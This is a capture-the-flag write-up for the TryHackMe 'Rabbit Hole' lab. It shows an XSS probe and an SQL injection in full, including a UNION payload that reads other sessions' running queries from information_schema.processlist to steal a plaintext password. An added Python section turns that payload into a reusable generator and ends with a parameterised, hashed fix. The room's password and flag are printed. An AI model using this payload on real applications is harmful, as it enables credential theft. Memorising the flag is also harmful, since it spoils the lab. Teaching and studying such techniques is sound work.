TryHackMe lab: Rabbit Hole
I recently bought a TryHackMe subscription and have been working through the pentest rooms (though this Rabbit Hole room doesn't actually require one).
Information gathering
Start with an nmap scan:
nmap -sC -sV -oN nmap/initial 10.10.192.187 -v
Only two ports are open: SSH and HTTP.
The HTTP service has just two functions, register and login.
After logging in, I noticed that admin logs in once every minute.
First idea: XSS.
XSS
Test username:
1</th></tr></thead><tbody></table><script>alert(1)</script>
The alert fires in my own browser, but nothing from admin's session is ever sent back.
Maybe admin's login runs with JavaScript disabled, or it is a script sending raw requests rather than a real browser?
SQL
Try SQL injection?
Try the username test"
The SQL statement errors out:
SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '"test"" ORDER BY login_time DESC LIMIT 0,5' at line 1
Stacked injection works as well, so dump the database.
But all the injection yields is an MD5 password hash, which is no use; presumably the plaintext password is needed to log in over SSH.
Changing admin's password and logging in as admin doesn't grant any special privileges either.
UNION injection works, but each row displays at most 16 characters, so the output has to be read in slices with SUBSTR.
Is there any way to get the plaintext password? Stuck....
I looked at other people's write-ups and learned a new exploitation idea.
Watching the running queries
Information Schema PROCESSLIST Table - MariaDB Knowledge Base
According to the official docs, the info column of information_schema.processlist holds the statement each connection is currently executing. An account without the PROCESS privilege only sees its own connections, but that is enough here: admin's scripted login goes through the same web app, so its query runs under the same database user as ours. The trick works only because the app compares the password inside the SQL itself, which puts the plaintext into the statement text.
Register the following username (entered as a single line), then keep refreshing the page; whenever admin's login is in flight, its statement shows up in the results. The leading " closes the app's string; each UNION ALL SELECT returns one 16-character slice of info as its own row, so the 16-character display limit no longer matters; where info not like "%info%" drops our own statement (which contains the word info), leaving only other sessions' queries; and the trailing -- - comments out the app's ORDER BY login_time DESC LIMIT 0,5, which would otherwise reorder the slices and cap them at five rows.
" union ALL select 0,SUBSTR(info,1, 16) from information_schema.processlist where info not like "%info%"
union ALL select 0,SUBSTR(info,17, 16) from information_schema.processlist where info not like "%info%"
union ALL select 0,SUBSTR(info,33, 16) from information_schema.processlist where info not like "%info%"
union ALL select 0,SUBSTR(info,49, 16) from information_schema.processlist where info not like "%info%"
union ALL select 0,SUBSTR(info,65, 16) from information_schema.processlist where info not like "%info%"
union ALL select 0,SUBSTR(info,81, 16) from information_schema.processlist where info not like "%info%"
union ALL select 0,SUBSTR(info,97, 16) from information_schema.processlist where info not like "%info%"
union ALL select 0,SUBSTR(info,113, 16) from information_schema.processlist where info not like "%info%"
union ALL select 0,SUBSTR(info,129, 16) from information_schema.processlist where info not like "%info%"
union ALL select 0,SUBSTR(info,145, 16) from information_schema.processlist where info not like "%info%"
union ALL select 0,SUBSTR(info,161, 16) from information_schema.processlist where info not like "%info%"
union ALL select 0,SUBSTR(info,177, 16) from information_schema.processlist where info not like "%info%"
union ALL select 0,SUBSTR(info,193, 16) from information_schema.processlist where info not like "%info%" -- -
That yields the password:
fEeFBqOXBOLmjpTt0B3LNpuwlr7mJxI9dR8kgTpbOQcLlvgmoCt35qogicf8ao0Qssh
SSH in with it (note the user is admin, not root)
and grab the flag:
THM{this_is_the_way_step_inside_jNu8uJ9tvKfH1n48}
Probably because this room is on the easy side, there is no privilege-escalation step after this.
Learned a new trick.
The lesson: build SQL queries with bound parameters (prepared statements), and never put the plaintext password into the query text at all. Look up the stored hash by username and verify the password in the application, and store it with a salted, deliberately slow password hash (bcrypt or argon2) rather than MD5.
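To tie the PROCESSLIST technique and the closing lesson together, here is an added Python example; it is not part of the write-up or of the room. It turns the chunked username payload into a generator (the page's 16-character width and 13 slices are one setting of it; other widths and lengths work too) and runs it against an in-memory SQLite model of the app: a database attached under the name information_schema with a processlist(info) table stands in for MariaDB's view, the seeded admin statement and its password are constructed for the example, and the injection uses single quotes because SQLite, unlike the page's MariaDB, treats "..." as an identifier. The second half shows the corrected history and login queries: bound parameters, and password verification in the application against a salted PBKDF2 hash, so no secret ever enters a statement.

```python
import hashlib
import hmac
import os
import sqlite3

# Constructed stand-in for the statement admin's automated login runs.
# The password is made up for this example; it is not the room's password.
EXAMPLE_PASSWORD = "ExamplePassw0rd-not-the-real-one"
ADMIN_LOGIN_SQL = ("SELECT * FROM users WHERE username='admin' "
                   f"AND password='{EXAMPLE_PASSWORD}'")
PBKDF2_ROUNDS = 200_000


def build_processlist_payload(width=16, total=208, quote='"'):
    """Generalize the write-up's username payload: one UNION ALL member per
    `width`-character slice of processlist.info, enough members to cover
    `total` characters (16/208 gives the write-up's 13 slices). The
    `not like %info%` filter drops our own statement, which contains the
    word info; `-- -` comments out the app's ORDER BY ... LIMIT 0,5."""
    members = [
        f"union ALL select 0,SUBSTR(info,{start},{width}) from "
        f"information_schema.processlist where info not like {quote}%info%{quote}"
        for start in range(1, total + 1, width)
    ]
    return quote + " " + " ".join(members) + " -- -"


def reassemble(rows):
    """Concatenate the (0, slice) rows the payload returns, in order."""
    return "".join(chunk for marker, chunk in rows if marker == 0)


def make_db():
    """In-memory SQLite model of the app. A database attached as
    information_schema with a processlist(info) table stands in for
    MariaDB's view; it is seeded with admin's in-flight login statement."""
    conn = sqlite3.connect(":memory:")
    conn.execute("ATTACH DATABASE ':memory:' AS information_schema")
    conn.executescript("""
        CREATE TABLE login_history(username TEXT, login_time TEXT);
        CREATE TABLE users(username TEXT PRIMARY KEY, salt BLOB, pw_hash BLOB);
        CREATE TABLE information_schema.processlist(info TEXT);
        INSERT INTO login_history VALUES ('alice', '2024-01-01 10:00:00'),
                                         ('alice', '2024-01-01 11:00:00');
    """)
    conn.execute("INSERT INTO information_schema.processlist VALUES (?)",
                 (ADMIN_LOGIN_SQL,))
    return conn


def vulnerable_history(conn, username, width=16):
    """The login-history query built the way the page's error message
    implies: the username is pasted into the SQL text (single quotes here,
    since SQLite reads "..." as an identifier). Each cell is cut to `width`
    characters, like the page's 16-character display limit."""
    sql = ("SELECT username, login_time FROM login_history "
           f"WHERE username='{username}' ORDER BY login_time DESC LIMIT 0,5")
    # Our own statement is visible in the process list while it runs.
    conn.execute("INSERT INTO information_schema.processlist VALUES (?)", (sql,))
    try:
        rows = conn.execute(sql).fetchall()
    finally:
        conn.execute("DELETE FROM information_schema.processlist WHERE info=?", (sql,))
    return [(c0, str(c1)[:width]) for c0, c1 in rows]


def probe_error(conn, username):
    """Return the database error text for a username, or None if it ran."""
    try:
        vulnerable_history(conn, username)
        return None
    except sqlite3.OperationalError as exc:
        return str(exc)


def steal_running_statement(conn):
    """Register the payload as the username and read the slices back."""
    return reassemble(vulnerable_history(conn, build_processlist_payload(quote="'")))


# The fix: bound parameters, and no secret inside any query text.

def safe_history(conn, username, width=16):
    rows = conn.execute("SELECT username, login_time FROM login_history WHERE "
                        "username=? ORDER BY login_time DESC LIMIT 0,5",
                        (username,)).fetchall()
    return [(c0, str(c1)[:width]) for c0, c1 in rows]


def create_user(conn, username, password):
    salt = os.urandom(16)
    pw_hash = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    conn.execute("INSERT INTO users VALUES (?, ?, ?)", (username, salt, pw_hash))


def safe_login(conn, username, password):
    """Only the username is bound into SQL; the password is verified in the
    application, so neither plaintext nor hash ever appears in a statement."""
    row = conn.execute("SELECT salt, pw_hash FROM users WHERE username=?",
                       (username,)).fetchone()
    if row is None:
        return False
    salt, stored = row
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return hmac.compare_digest(candidate, stored)


if __name__ == "__main__":
    db = make_db()
    print(probe_error(db, "test'"))  # unterminated-string error, as on the page
    print(steal_running_statement(db))  # admin's statement, password included
```

Run it directly to see the same kind of unterminated-string error the page got for test" (here for test'), followed by admin's recovered statement. Changing width and total adapts the payload to a different display limit or a longer target statement; the safe_login path shows why the fix is not just parameterization but keeping the password out of the SQL entirely.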